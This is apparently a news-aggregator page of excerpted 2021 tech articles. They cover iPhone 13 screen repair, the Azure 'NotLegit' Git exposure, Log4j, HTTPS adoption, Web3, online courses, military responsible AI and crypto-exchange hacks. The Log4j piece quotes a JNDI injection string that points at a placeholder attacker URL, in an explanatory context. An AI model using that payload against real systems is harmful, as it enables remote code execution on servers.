Page 2,393«..1020..2,3922,3932,3942,395..2,4002,410..»

iOS 15.2 Makes it Easier to Replace the Screen on the iPhone 13 – iDrop News

It appears that iOS 15.2 packs in one more small but significant improvement that should improve the lives of do-it-yourselfers and independent repair shops.

Last month, well-known DIY repair site iFixit blew the whistle on an unfriendly new feature in the iPhone 13 lineup that would have made it far more difficult for small third-party repair providers to swap out a broken iPhone display.

The problem, iFixit pointed out, was that replacing the screen on any iPhone 13 model would break Face ID unless very specific and extremely complex steps were taken to also move a very small microchip over from the old display, and delicately microsolder it into the new one.

Since this is well beyond the skill set of most DIYers, and even many small repair shops, it basically threatened to block these kinds of repairs entirely.

To be clear, this wasnt just a problem with non-genuine displays, either. Even swapping displays between two identical, brand new iPhone 13 models would result in Face ID being disabled on both of them.

Like the Touch ID sensor on older iPhone models, Apple pairs, or serializes the TrueDepth camera system with each specific iPhone to protect against potential tampering that could allow hackers to bypass the normal security protocols. However, it made no sense that the display should be serialized in this manner, since its not connected to any of the components used by Face ID.

Even so, the display used in the iPhone 13 includes a small chip about the size of a Tic-Tac, and this is uniquely linked to the specific iPhone 13 device that it was originally installed on. Move that screen to another device, and the new iPhone will fail to recognize it, declaring it non-genuine and disabling Face ID in the process.

This isnt a problem for authorized Apple repair shops, as they have access to special tools that allow them to sync up the iPhone with a new display via Apples cloud servers. Of course, these tools arent available to independent repair shops unless theyre willing to sign up for Apples Independent Repair Provider (IRP) program.

However, many smaller shops consider the terms of that program far too onerous, since Apple requires them to submit to random inspections to look for prohibited repair parts, and customers have to sign special waivers acknowledging that theyre not getting real Apple repairs.

Not long afteriFixitbroke the news, Apple promised that a fix would be coming in a future iOS update, and it looks like thats arrived with iOS 15.2.

While Apple made no mention of it in the iOS 15.2 release notes, iFixit has confirmed that the latest version fixes the Face ID Repair Trap on the iPhone 13. Its also upgraded its Repairability Score for the iPhone 13 to 6 out of 10, bringing it back in line with other recent iPhone models.

After iOS 15.2 landed, iFixit conducted a full parts-swap test, grabbing to iPhone 13 Pro Max devices and moving over not just the display, but also the battery and the camera system.

In doing so, iFixit discovered that even though Face ID will no longer be disabled when swapping a new screen over, Apple still provides the usual series of Important warnings telling users that theyre not using genuine Apple parts.

To be fair, this shouldnt come as a big surprise, since Apple has been doing this with batteries for a few years now, and began flashing up the same warnings for the screen and camera with the iPhone 11 and iPhone 12, respectively.

iFixit also points out that theres an interesting discrepancy between the messages, however. Apple using the phrase Unable to determine for the display and camera, and points the user to the Settings app for more information.

By comparison, the battery warning says, Unable to verify, and omits the section telling the user to Go to Settings for more information, although it still includes a Settings button that takes the user to the battery health section of the Settings app.

Its probably not entirely a coincidence that iOS 15.2 also introduces a new Parts and Service History section in the Settings app, giving you a summary of which parts have been replaced, and whether theyre genuine.

This section will only appear if youve had anything replaced on your iPhone it doesnt show up if your device still has all of its original parts. It also only shows the status of parts that would normally generate a warning on each given model if they werent genuine. For instance, Apple only started serializing the camera with last years iPhone 12 models, so iOS 15.2 wont be able to tell you if an iPhone 11 or older model is using a non-genuine camera.

Continue reading here:
iOS 15.2 Makes it Easier to Replace the Screen on the iPhone 13 - iDrop News

Read More..

4-Year-Old Bug in Azure App Service Exposed Hundreds of Source Code Repositories – The Hacker News

A security flaw has been unearthed in Microsoft's Azure App Service that resulted in the exposure of source code of customer applications written in Java, Node, PHP, Python, and Ruby for at least four years since September 2017.

The vulnerability, codenamed "NotLegit," was reported to the tech giant by Wiz researchers on October 7, 2021, following which mitigations have been undertaken to fix the information disclosure bug in November. Microsoft said a "limited subset of customers" are at risk, adding "Customers who deployed code to App Service Linux via Local Git after files were already created in the application were the only impacted customers."

The Azure App Service (aka Azure Web Apps) is a cloud computing-based platform for building and hosting web applications. It allows users to deploy source code and artifacts to the service using a local Git repository, or via repositories hosted on GitHub and Bitbucket.

The insecure default behavior occurs when the Local Git method is used to deploy to Azure App Service, resulting in a scenario where the Git repository is created within a publicly accessible directory (home/site/wwwroot).

While Microsoft does add a "web.config" file to the .git folder which contains the state and history of the repository to restrict public access, the configuration files are only used with C# or ASP.NET applications that rely on Microsoft's own IIS web servers, leaving out apps coded in other programming languages like PHP, Ruby, Python, or Node that are deployed with different web servers like Apache, Nginx, and Flask.

"Basically, all a malicious actor had to do was to fetch the '/.git' directory from the target application, and retrieve its source code," Wiz researcher Shir Tamari said. "Malicious actors are continuously scanning the internet for exposed Git folders from which they can collect secrets and intellectual property. Besides the possibility that the source contains secrets like passwords and access tokens, leaked source code is often used for further sophisticated attacks."

"Finding vulnerabilities in software is much easier when the source code is available," Tamari added.

Here is the original post:
4-Year-Old Bug in Azure App Service Exposed Hundreds of Source Code Repositories - The Hacker News

Read More..

Log4j a catastrophic internet security flaw – Newspaper – DAWN.COM – DAWN.com

The information technology industry is facing a Covid-like situation in its security realm due to Log4j vulnerability. Fear is that international hackers are already active in exploiting the breach in security.

The US Department of Homeland Security is raising a severe alarm, urging federal agencies to swiftly erase the issue since its so easy to be exploited and telling those with public-facing networks to put up firewalls if they cant be sure. The impacted software is modest and sometimes undocumented.

Detected in a frequently used program called Log4j, the exploit lets internet-based attackers rapidly grab control of everything from industrial control systems to web servers and consumer devices. Simply detecting which computers utilise the utility is a challenge; it is sometimes concealed under layers of other applications.

According to some estimations, up to 3bn systems and 44pc of organisations could be potentially compromised by the Log4j issue.

Those readers who are IT specialists, might be wondering what is Log4j vulnerability? For them, the quick answer is, it is like the SAQL injection, a familiar vulnerability of the past. The code snippet (${jndi:ldap://[attacker_URL]}) might look familiar to software developers familiar with code injections.

Log4j is a Java library that is used for logging errors and other software activities. All an attacker has to do, to exploit the flaw, is strategically send a malicious code string that eventually gets logged by Log4j affected version. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.

According to some estimations, up to 3 billion systems and 44 per cent of organisations could be potentially compromised by the Log4j issue. Millions of attempts by hackers have been logged on numerous networks. If anything, its now achingly evident that Log4Shell will continue to wreak havoc across the internet for years to come.

While this is a high-severity vulnerability, it takes a very specific configuration to exploit. In case your organisation is affected, one quick fix could be to modify the Gradle or Maven configuration files to prevent the use of the affected version of Log4j library, while you look for a permanent fix. A comprehensive way to solve this issue is to upgrade to a corrected version of Log4J, above 2.16. The good news is that just like Covid, we will come out of it sooner, not later, as numerous teams of experts are working day and night to repair the issue.

The writer is an IT professional, trained in the USA

Published in Dawn, The Business and Finance Weekly, December 27th, 2021

Read more from the original source:
Log4j a catastrophic internet security flaw - Newspaper - DAWN.COM - DAWN.com

Read More..

We Encrypted the Web: 2021 Year in Review – EFF

In 2010, EFF launched its campaign to encrypt the entire webthat is, move all websites from non-secure HTTP to the more secure HTTPS protocol. Over 10 years later, 2021 has brought us even closer to achieving that goal. With various measurement sources reporting over 90% of web traffic encrypted, 2021 saw major browsers deploy key features to put HTTPS first. Thanks to Lets Encrypt and EFFs own Certbot, HTTPS deployment has become ubiquitous on the web.

For more than 10 years, EFFs HTTPS Everywhere browser extension has provided a much-needed service to users: encrypting their browser communications with websites and making sure they benefit from the protection of HTTPS wherever possible. Since we started offering HTTPS Everywhere, the battle to encrypt the web has made leaps and bounds: what was once a challenging technical argument is now a mainstream standard offered on most web pages. Now HTTPS is truly just about everywhere, thanks to the work of organizations like Lets Encrypt. Were proud of EFFs own Certbot tool, which is Lets Encrypts software complement that helps web administrators automate HTTPS for free.The goal of HTTPS Everywhere was always to become redundant. That would mean wed achieved our larger goal: a world where HTTPS is so broadly available and accessible that users no longer need an extra browser extension to get it. Now that world is closer than ever, with mainstream browsers offering native support for an HTTPS-only mode.

In 2020, Firefox announced an HTTPS-only mode feature that all users can turn on, signaling that HTTPS adoption was substantial enough to implement such a feature. 2021 was the year the other major browsers followed suit, starting with Chrome introducing an HTTPS default for navigation when a user types in the name of a URL without specifying insecure HTTP or secure HTTPS. Then in June, Microsofts Edge announced an automatic HTTPS feature that users can opt into. Then later in July, Chrome announced their HTTPS-first mode, which attempts to automatically upgrade all pages to HTTPS or display a warning if HTTPS isnt available. Given Chromes dominant share of the browser market, this was a huge step forward in web security. Safari 15 also implemented a HTTPS-first mode in its browsers. However, it does not block insecure requests like in Firefox, Chrome, and Edge.

With these features rolled out, HTTPS is truly everywhere, accomplishing the long-standing goal to encrypt the web.

SSL/TLS libraries are heavily used in everyday critical components of our security infrastructure, like transportation of web traffic. These tools are primarily built in the C programming language. However, C has a long history of memory safety vulnerabilities. So the Internet Security Research Group has led the development of building an alternative to certain libraries like OpenSSL in the Rust language. Rust is a modern, memory-safe programming language and the TLS library built in Rust has been named Rustls. Rustls has also been integrated for support in popular networking command line utilities such as Curl. With Rustls, important tools that use TLS can gain memory safety and make networks ever more secure and less vulnerable.

Since 2015, EFFs Certbot tool has helped millions of web servers deploy HTTPS by making the certificate process free and easy. This year we significantly updated the user experience of Cerbots command-line output for clarity. We also translated parts of the website into Farsi in response to user requests, and now we have the Instructions Generator available in this language. We hope to add more languages in the future and make TLS deployment in websites even more accessible across the globe.

Even as we see positive movement by major browsersfrom the HTTPS-by-default victories above to ending insecure FTP support and even Chrome adopting a Root Store programwe are also watching the potential dangers to these gains. Encrypting the net means sustaining the wins and fighting for tighter controls across all devices and major services.

HTTPS is ubiquitous on the web in 2021, and this victory is the result of over a decade of work by EFF, our partners, and the supporters who have believed in the dream of encrypting the web every step of the way.

Thank you for your support in fighting for a safer and more secure internet.

This article is part of our Year in Review series. Read other articles about the fight for digital rights in 2021.

Read the original post:
We Encrypted the Web: 2021 Year in Review - EFF

Read More..

The Global Secure Sockets Layer (SSL) Certification Market is expected to grow by $ 5.13 bn during 2021-2025, progressing at a CAGR of 21.30% during…

Global Secure Sockets Layer Certification Market 2021-2025 The analyst has been monitoring the secure sockets layer certification market and it is poised to grow by $ 5. 13 bn during 2021-2025, progressing at a CAGR of 21.

New York, Dec. 24, 2021 (GLOBE NEWSWIRE) -- Reportlinker.com announces the release of the report "Global Secure Sockets Layer (SSL) Certification Market 2021-2025" - https://www.reportlinker.com/p05251392/?utm_source=GNW 30% during the forecast period. Our report on the secure sockets layer certification market provides a holistic analysis, market size and forecast, trends, growth drivers, and challenges, as well as vendor analysis covering around 25 vendors.The report offers an up-to-date analysis regarding the current global market scenario, latest trends and drivers, and the overall market environment. The market is driven by the need to adhere to regulatory requirements and increasing awareness of end-users. In addition, the need to adhere to regulatory requirements is anticipated to boost the growth of the market as well.The secure sockets layer certification market analysis includes the product segment and geographic landscape.

The secure sockets layer certification market is segmented as below:By Product Domain validation Organizational validation Extended validation

By Geographical Landscape North America Europe APAC South America MEA

This study identifies the increasing number of data theftsas one of the prime reasons driving the secure sockets layer certification market growth during the next few years.

The analyst presents a detailed picture of the market by the way of study, synthesis, and summation of data from multiple sources by an analysis of key parameters. Our report on secure sockets layer certification market covers the following areas: Secure sockets layer certification market sizing Secure sockets layer certification market forecast Secure sockets layer certification market industry analysis

This robust vendor analysis is designed to help clients improve their market position, and in line with this, this report provides a detailed analysis of several leading secure sockets layer certification market vendors that include Aruba Spa, Asseco Poland S.A., Comodo Security Solutions Inc., DigiCert Inc., Entrust Datacard Corp., GlobalSign Ltd., GoDaddy Inc., HID Global Corp., Internet Security Research Group, and NortonLifeLock Inc. Also, the secure sockets layer certification market analysis report includes information on upcoming trends and challenges that will influence market growth. This is to help companies strategize and leverage all forthcoming growth opportunities.The study was conducted using an objective combination of primary and secondary information including inputs from key participants in the industry. The report contains a comprehensive market and vendor landscape in addition to an analysis of the key vendors.

The analyst presents a detailed picture of the market by the way of study, synthesis, and summation of data from multiple sources by an analysis of key parameters such as profit, pricing, competition, and promotions. It presents various market facets by identifying the key industry influencers. The data presented is comprehensive, reliable, and a result of extensive research - both primary and secondary. Technavios market research reports provide a complete competitive landscape and an in-depth vendor selection methodology and analysis using qualitative and quantitative research to forecast the accurate market growth.Read the full report: https://www.reportlinker.com/p05251392/?utm_source=GNW

About ReportlinkerReportLinker is an award-winning market research solution. Reportlinker finds and organizes the latest industry data so you get all the market research you need - instantly, in one place.

__________________________

Story continues

Here is the original post:
The Global Secure Sockets Layer (SSL) Certification Market is expected to grow by $ 5.13 bn during 2021-2025, progressing at a CAGR of 21.30% during...

Read More..

What is Web3, is it the new phase of the Internet and why are Elon Musk and Jack Dorsey against it? – Euronews

Web3 has become the latest buzzword to get tech and cryptocurrency enthusiasts talking. While some are excited at what is being dubbed as the next phase of the Internet, others, including Elon Musk and Jack Dorsey, have voiced their concerns over it.

But what is Web3 and can this decentralised vision of the Internet work?

Put simply, Web3 is an umbrella term for an online ecosystem that cuts out the big middlemen on the Internet. So, platforms on Web3 are not owned by central gatekeepers and you wouldnt navigate the Internet through search engines such as Google.

It uses blockchain, the same system used by cryptocurrencies and non-fungible tokens (NFTs).

The first version of the world wide web was launched by Sir Tim Berners-Lee in 1989. Back then, the few people who had the knowledge to could put information online in a decentralised way.

Web 2.0 came some 10 years later and started with the development of tools that were easy to use, allowing anyone to upload content online via the tech giants such as Google, Twitter and Facebook (now Meta).

But these free tools supplied by the tech companies, that allowed everyone to become publishers, was also harvesting our personal data to be used for tailored advertisements and marketing campaigns.

In theory, Web3 will be a combination of the two earlier versions of the Internet but will take the power away from the tech giants and corporations and put it back into the peoples hands.

And instead of exchanging our data to upload content online, users can become participants and shareholders by earning tokens on the blockchain system, which will allow you to have a say over a network.

Web 2.0 is the transmission of information but Web3 is the transmission of values, said Pascal Gauthier, CEO of the crypto hardware wallet Ledger, one of Frances unicorns.

We can see that currently on the Internet, your experience becomes bad as soon as you have to take out your credit card, he told Euronews Next, adding, Web3 basically fixes issues such as payments.

How does it work?

In the Web3 world, search engines, marketplaces and social networks will have no overriding overlord.

So you can control your own data and have a single personalised account where you could flit from your emails to online shopping and social media, creating a public record of your activity on the blockchain system in the process.

A blockchain is a secure database that is operated by users collectively and can be searched by anyone. People are also rewarded with tokens for participating.

It comes in the form of a shared ledger that uses cryptography to secure information. This ledger takes the form of a series of records or blocks that are each added onto the previous block in the chain, hence the name.

Each block contains a timestamp, data, and a hash. This is a unique identifier for all the contents of the block, sort of like a digital fingerprint.

The idea of a decentralised Internet has been in the works for the last decade with the explosion of cryptocurrencies and blockchain, and there are arguably some early Web3 applications that already exist. But we are not officially in the Web3 world.

Is Web3 too idealistic?

The idea of a decentralised internet may sound far-fetched but big tech companies are already betting big on it and even assembling Web3 teams.

But even if power is taken away from the tech giants, the people currently shaping Web3 are software developers and venture investors. Meanwhile, blockchain networks are not equally distributed and are in the hands of venture capitalists and early adopters.

This week, the former Twitter CEO Jack Dorsey suggested that Web3 is under the control of the venture capital industry, particularly the firm Andreessen Horowitz, an early Facebook backer and a Web3 advocate.

You dont own Web3. The VCs and their LPs do. It will never escape their incentives. Its ultimately a centralized entity with a different label, the Squares CEO tweeted.

On Thursday, Dorsey tweeted in response that he had been blocked on Twitter by Marc Andreessen, co-founder of Andreessen Horowitz.

Meanwhile, Tesla chief Elon Musk says Web3 is more of a marketing buzzword than reality.

"Im not suggesting web3 is real seems more marketing buzzword than reality right now just wondering what the future will be like in 10, 20 or 30 years. 2051 sounds crazy futuristic," he wrote on Twitter.

Musk also asked where it was, to the annoyance of Web3 devotees.

What are the challenges?

Experts have expressed concerns over how to regulate a decentralised internet, which would make it even more difficult to prevent cybercrime, hate speech and misinformation.

Web3 can also be hard to use but Gauthier says the challenge is not if people can access it easily but if they know how to manage their data securely.

Anyone on the planet can access Bitcoin or Ethereum today, as long as you have an internet connection. So there are billions of human beings that can access Web3 systems while the same human beings cannot necessarily access the banking system, he said.

To understand how Web3 works, there are some mistakes you should be aware of and you have to pay attention to your safety.

Before, in the financial world, security was provided by your bank. All of a sudden, now, you have to do it yourself since you own the privileges and you can manage your money online. So that means that there is a whole education and understanding part of the security issues that are important.

Building the technology to make Web3 fully decentralised, which has never been done before, is also one of the challenges.

Creating decentralised tools is not easy. Centralised systems are easier to build but less transparent, said rsula OKuinghttons, director of public relations of the blockchain infrastructure company Parity Technologies, who also works with the Web3 Foundation.

Some blockchain hybrids are a combination of centralised and decentralised systems but creating 100 per cent decentralised tools is the hardest and the longest part. But this is what Web3 is truly about, she told Euronews Next.

Go here to see the original:
What is Web3, is it the new phase of the Internet and why are Elon Musk and Jack Dorsey against it? - Euronews

Read More..

Covid, Online Professional Programmes; Here Are Top Trending Courses In 2021 – NDTV

2021 year-ender: Trending courses during the year

Image credit: Shutterstock

While the year 2021 saw disruptions in most of the academic courses due to the ongoing Covid pandemic, several online courses provided by Study Webs of Active Learning for Young Aspiring Minds (SWAYAM), Indian Institutes of Technology (IITs) and other institutions and platforms this year were trending. With colleges and universities holding classes remote, students have enrolled in online courses for their easy accessibility and easy course format.

Given the developments in the last five years and unprecedented Covid times, as per International Career and College Counseling (IC3) Institute Academic Head, Amrita Ghulati, there has been a definite surge in courses related to Artificial Intelligence, Machine learning, Cyber security, Data Science, Digital Marketing, Business Analytics, and Health care.

Particularly, interesting is the growth in courses in entrepreneurship and innovation across different levels of education, also being embedded in some well-established, traditional programs of study. Another noticeable trend is the bent towards more broad-based, inter and multidisciplinary courses T-shaped education with breadth across disciplines coupled with depth or specialization in one or two domains," IC3 Institute Academic Head added.

Also, the second wave of Covid which hit the country during the beginning of the year had led medical professionals and healthcare executives to delve into courses to learn what the virus is all about and how to approach patients who are affected.

With the year coming to an end, let us look at the emerging courses in 2021.

Academic Writing course is among one of the emerging SWAYAM certificate courses that aimed to bridge the gap by providing knowledge for effective and result-oriented academic writing. The course is a foundation-level course and the learning depends on how a learner does their research work on a specific area. Students can avail Academic Writing course in SWAYAM. The course duration is 15 weeks and the course is in line with the higher education regulator, University Grants Commissions pre-PhD courses work.

With the increase in the penetration of the internet and online activity, the scope of digital marketing has also increased. Digital marketing includes topics like content marketing, search engine optimization (SEO), social media and marketing analytics.

The course in Peace and Conflict Management is one of the Swayam online courses that seek to teach the concept of peace and the role of peace in human development. The course in Peace and Conflict Management also seeks to teach learners theories and types of conflict, methods of conflict management, and contemporary initiatives of peace.

The Blockchain courses are designed to help technical and non-technical learners with key concepts. Kerala Blockchain Academy, under the state-run Digital University Kerala, offered two free fundamental programs in Blockchain technology.

The Robotics course was also in trend in 2021. The course in Robotics is one of the SWAYAM free online courses offered by the Indian Institute of Science (IISc) Bangalore and is designed for PhD and Masters students in Electrical/ Mechanical engineer and Computer science. Students belonging to all disciplines of Engineering, Researchers and practicing Engineers can take courses in Robotics in SWAYAM. The Robotics course in SWAYAM platform is a eight-week course.

The course on Covid-19 Contract Tracing is for physicians, nurses, and other healthcare professionals. This course helps the learners to have a unified and evidence-based approach to saving the lives of patients affected by Covid.

With students and professionals working remote during 2021, many learners enrolled for courses on Languages. A study published in the journal Scientific Reports also found that learning foreign languages enhances the brain's elasticity and its ability to code information.

Data Science courses have been in the hype in 2021. Courses in Data Science will let a student help in analysing data or information from different sources and gain maximum insight. Data Science courses have been provided by the Indian Institutes of Technology (IITs) including in Delhi and Madras.

Introduced in 2020, IIT Madras BSc in Programming and Data Science, is the first-ever online degree programme offered by an IIT.

Digital transformation has truly led the way in 2021 and full-stack software and product engineering, cloud computing, data science, and other technologies have been the key enablers of actioning this transformation, Abhishek Arora, EVP and Business Head, Skills and Careers Business, NIIT Ltd said.

Adding that NIIT is in the process of developing free content for its learners and prospective learners and aims to deep-skill them so as to make them future ready, Mr Arora further added that: "With industry 4.0, there is a general tilt towards courses which focus on automation, Internet of Things, Artificial Intelligence amongst others and a learner equipped with these in-demand skills tends to have an edge amongst recruiters. Apart from enabling better job opportunities, they offer ample other advantages too such as edge over competition, equipped with knowledge on real-life projects etc."

Read this article:
Covid, Online Professional Programmes; Here Are Top Trending Courses In 2021 - NDTV

Read More..

It’s both AI technology and ethics that will enable JADC2 – Breaking Defense

Artificial intelligence graphic courtesy of Northrop Grumman.

Questions that loom large for the wider application of artificial intelligence (AI) in Defense Department operations often center on trust. How does the operator know if the AI is wrong, that it made a mistake, that it didnt behave as intended?

Answers to questions like that come from a technical discipline known as Responsible AI (RAI). Its the subject of a report issued by the Defense Innovation Unit (DIU) in mid-November called Responsible AI Guidelines in Practice, which addresses a requirement in the FY21 National Defense Authorization Act (NDAA) to ensure that the DoD has the ability, requisite resourcing, and sufficient expertise to ensure that any artificial intelligence technologyis ethically and reasonably developed.

DIUs RAI guidelines provide a framework for AI companies, DOD stakeholders and program managers that can help to ensure that AI programs are built with the principles of fairness, accountability, and transparency at each step in the development cycle of an AI system, according to Jared Dunnmon, technical director of the artificial intelligence/machine learning portfolio at DIU.

This framework is designed to achieve four goals, said Dunnmon:

Trust in the AI is foremost

Just like Isaac Asimovs Three Laws of Robotics describes ethical behavior for robots, the DIUs guidelines offer five ethical principles for development and use of artificial intelligence.

Its that fifth principle, governable, that addresses the questions asked at the top about letting the operator know when the AI is wrong. Operators need to establish trust in the AI systems or they simply wont be used. Thats not an option for something as complex as the Joint All Domain Command and Control concept of operations.

Dr. Amanda Muller, Consulting (AI) Systems Engineer and Technical Fellow, who is the Responsible AI Lead for Northrop Grumman.

Governable AI systems allow for graceful termination and human intervention when algorithms do not behave as intended, said Dr. Amanda Muller, Consulting AI Systems Engineer and Technical Fellow, who is the Responsible AI Lead for Northrop Grumman, which is one of the few companies with such a position. At that point, the human operator can either take over or make adjustments to the inputs, to the algorithm, or whatever needs to be done. But the human always maintains the ability to govern that AI algorithm.

Northrop Grummans adoption of these RAI principles builds justified confidence in the AI systems being created because the human can understand and interpret what the AI is doing, determine if its operating correctly through verification and validation, and take actions if it is not.

The importance of doing so is clear for the future of AI in the military. If AI systems do not work as designed or are unpredictable, leaders will not adopt them, operators will not use them, Congress will not fund them, and the American people will not support them, states the Final Report from the National Security Commission on Artificial Intelligence (NSCAI). This commission was a temporary, independent, federal entity created by Congress in the National Defense Authorization Act for Fiscal Year 2019. The commission was led by former Google CEO Eric Schmidt and former Deputy Secretary of Defense Robert Work, and delivered its 756-page Final Report in March 2021, disbanding in October.

The power of AI is its ability to learn and adapt to changing situations, said Muller. The battlefield is a dynamic environment and the side that adapts fastest gains the advantage. Like with all systems, though, AI is vulnerable to attack and failure. To truly harness the power of AI technology, developers must align with the ethical principles adopted by the DoD.

The complexity of all-domain operations will demand AI

The DoDs pledge to develop and implement only Responsible Artificial Intelligence will underpin development of systems for JADC2. An OODA (Observe, Orient, Decide, Act) loop stretching from space to air and ground, and to sea and cyber will only be possible through the ability of an AI system to control the JADC2 infrastructure.

Vern Boyle, Vice President of Advanced Processing Solutions for Northrop Grummans Networked Information Solutions div.

The AI could perceive and reason on the best ways to move information across different platforms, nodes, and decision makers, explained Vern Boyle, Vice President of Advanced Processing Solutions for Northrop Grummans Networked Information Solutions division. And it could optimize the movement of that information and the configuration of the network because itll be very complex.

Well be operating in contested environments where it will be difficult for a human to react and understand how to keep the network and the comm links functioning. The use of AI to control the communication and networking infrastructure is going to be one big application area.

At the same time, RAI will serve as a counterweight to Americas Great Power competitors, China and Russia, who certainly wont engage in ethical AI as they push for power. As part of its strategic plan, China has declared it will be the global leader in AI by 2030 and its investments in dual-use technologies like advanced processing, cyber security, and AI are threats to U.S. technical and cognitive dominance.

The key difference is that China is applying AI technologies broadly throughout the country, said Boyle. They are using AI for surveillance and tracking their citizens, students, and visitors. They use AI to monitor online behaviors, social interactions and biometrics.

China has no concern about privacy rights or ethical application of the data that AI is able to gather and share. All data is collected and used by both industry and the Chinese government to advance their goal of global, technical dominance by 2030.

Fundamental to the U.S response to Chinas actions is assuring that the Defense Departments use of AI reflects democratic values, according to Boyle.

It is critical that we move rapidly to set the global standard for responsible and ethical AI use, and to stay ahead of China and Russias advances toward the lowest common denominator. The U.S., our ally partners, and all democratic-minded nations must work together to lead the development of global standards around AI and talent development.

Northrop Grumman systems to close the connectivity/networking gap

Doing so will help to close one of the most significant capability gaps facing armed forces right now, which is basic connectivity and networking. The platforms and sensors needed to support JADC2satellites, unmanned air and ground systems, and guided missile destroyers, to name a fewarent necessarily able to connect and move information effectively because of legacy communications and networking systems.

That reality will dampen the DoDs ambitions for AI and machine learning for tactical operations.

Its both a gap and a challenge, observed Boyle. Lets assume, though, that everyones connected. Now theres an information problem. Not everybody shares their information. Its not described in a standard way. Having the ability to understand and reason on information presumes that youre able to understand it. Those capabilities arent necessarily mature yet either.

There are also challenges with respect to multi-level security and the ability to share and distribute information at different classification levels. That adds a level of complexity thats not typically present in the commercial sector.

The severity of this issue and the need to solve it in the name of all-domain operations is driving Northrop Grumman to prioritize the successful application of AI to communications and networking.

The company has numerous capabilities deployed now on important platforms such as Global Hawk and is working with customers to leverage gateway systems in service now for data relay, while developing new capabilities to address gaps in communications and networking.

AI graphic courtesy of Northrop Grumman.

Northrop Grummans portfolio already contains enabling technologies needed to connect joint forces, including advanced networking, AI/ML, space, command and control systems, autonomous systems powered by collaborative autonomy, and advanced resiliency features needed to protect against emerging threats. And it is developing AI that acts as the connective tissue for military platforms, sensors, and systems to communicate with one anotherenabling them to pass information and data using secure, open systems, similar to how we use the Internet and 5G in our day-to-day lives.

The DoD has stated that it must have an AI-enabled force by 2025 because speed will be the differentiator in future battles, said Boyle That means speed to understand the battle space; speed to determine the best course of action to take in a very complex and dynamic battle space; and speed to be able to take appropriate actions. Together, they will let the DoD more quickly execute the OODA Loop (Observe, Orient, Decide, Act).

AI and advanced, specialized processing at the tactical edge will provide a strategic information advantage. AI and edge computing are the core enabling technologies for JADC2.

See more here:
It's both AI technology and ethics that will enable JADC2 - Breaking Defense

Read More..

How to tackle cyber hacks on crypto exchanges – Legal Cheek

LSE law graduate Hui Ting Tan considers the case for reform

In the past year, there have been a spate of hacking attacks on cryptocurrency exchanges, which are exchanges which allow people to trade digital currencies such as Bitcoin and Ethereum. Last September, a hacker managed to take out $610 million (460 million) worth of customers coins from Poly Network, a Japanese cryptocurrency exchange.

Interestingly, the hacker returned all of the stolen assets, claiming that the hack was just an attempt to highlight the vulnerabilities in Poly Networks system. When the heist was discovered, Poly Network immediately published the addresses to which the digital assets had been transferred, and asked centralised crypto exchanges to stop all asset flows stemming from the specified addresses. Tether, a stablecoin operator immediately froze $33 million of the stolen assets, while other major exchanges such as Binance agreed to look into the matter. In the meantime, internet sleuths sprung quickly into action to piece together information about the hacker. A cyber security firm called Slowmist even claimed to have personal information relating to the hacker, such as the hackers IP address and email information.

Regardless of whether the hackers motivations can be taken at face value, what is evident is that identifying errors in the code of a crypto exchange is one thing, but actually laundering those ill-gotten gains into money in the real world is another. Due to the transparency of the blockchain technology upon which the cryptocurrencies are built, every transaction in the digital markets is publicly transparent on blockchains, and as proponents of De-Fi (decentralised finance) like to argue, this creates a crowdsourced imitation of a self-regulating banking system.

What are the inherent or systemic problems with having a self-regulatory banking system however? For one, how do you draw the line between an ethical white hat hacker, who is just exploiting a bug in the system, and a self-interested criminal? There is of course an argument distinctive to the De-Fi and blockchain context. The unique strength of an open-sourced technological system is that improvements to the system itself are built upon community improvements and ingenuity. On the other hand, what is clear is that ethical hacking cannot be without scope. No ethical hacker would risk the assets or data of thousands of users. One might imagine that if every firm that were a victim of a hack were to legitimise these actions by labelling these acts as whitehats, then ethical hacking would be devoid of any meaning.

What I find more concerning is the notion that criminality and the commensurate level of punishment can be outsourced to a private company, like Poly Network. Hypothetically, imagine if a group of armed robbers organised a traditional bank heist, and was able to steal a significant sum of money, which it eventually returned, although it had broken numerous criminal laws along the way, such as criminal trespass, common assault, and other public crimes. Lets imagine as well that the bank is unable to print or obtain more money, and was thus compelled to offer the robbers criminal immunity and a monetary reward if the money was returned. That the money eventually came to no harm is irrelevant, it would even be irrelevant if the armed robbers were not eventually found to be guilty of those accompanying crimes. In my opinion, what is problematic is the idea that a private company is able to arbitrarily dictate the criminality of a hack, or to even whitewash a criminal hack for commercial reasons.

Want to write for the Legal Cheek Journal?

Things havent ended on a sour note because the assets have been returned, but shouldnt it be time to consider the implications if a similar situation were to happen again? What happens then if a significant number of consumers of a hugely popular crypto-asset exchange were to lose their life savings through the brilliance of an unscrupulous hacker? What are the legal protections available to consumers, and how robust is the regulatory and compliance regime in place to prevent crypto-assets from being laundered?

From a consumer protection perspective, there are unsurprisingly no guarantees of reimbursement in a largely unregulated sector. In fact, a haircut has become a term used to describe partial compensation in the wake of a cyber-attack. For example, in the wake of a hack on Bitfinex () in August 2016, which caused a loss of 120,000 Bitcoin, worth around $75 million at the time, its users faced a 36% haircut regardless of whether they held any Bitcoin.

In terms of Anti-Money Laundering (AML) and Know-Your-Customer (KYC) regulation, the UK Financial Conduct Authority (FCA) is the regulator of crypto-asset companies in the UK. Crypto-asset companies have to comply with the Money Laundering, Terrorist Financing and Transfer of Funds Regulations 2017, which includes the requirement of having to be registered with the FCA in order to continue business. The FCA also introduced a Temporary Registration Regime for firms that had applied to be registered before, but whose applications were still being processed. As it turns out, the FCA had to extend the deadline for the Temporary Registration Regime (for existing businesses when the requirement was first announced) to 31 March 2022, due to the unprecedented number of firms which could not meet these requirements () and had to withdraw their applications. Since the need to register with the FCA was introduced in January 2020, only five companies have successfully registered with the regulator. In short, the issue isnt really that of a lack of regulation, but that the sector as a whole has yet to catch up in terms of cyber-security and AML practices.

This seems to suggest therefore that there is a good chance that retail investors and consumers of such crypto-asset exchanges are using products with significant cybersecurity risks. The need to raise regulatory standards therefore seems like a natural answer. On the other hand, it has been argued that stricter regulatory rules only drive criminals towards exchanges in jurisdictions with looser regulatory requirements. However, as pointed out by Michael Philipps (), chief claims officer at cyber insurance group Resilience, these exchanges usually have lower liquidity, which makes the laundering process more difficult. If what we are concerned about is preventing large-scale hacking heists amongst the most widely used exchanges in the UK, then imposing a level of regulation commensurate with the increased level of risk makes sense.

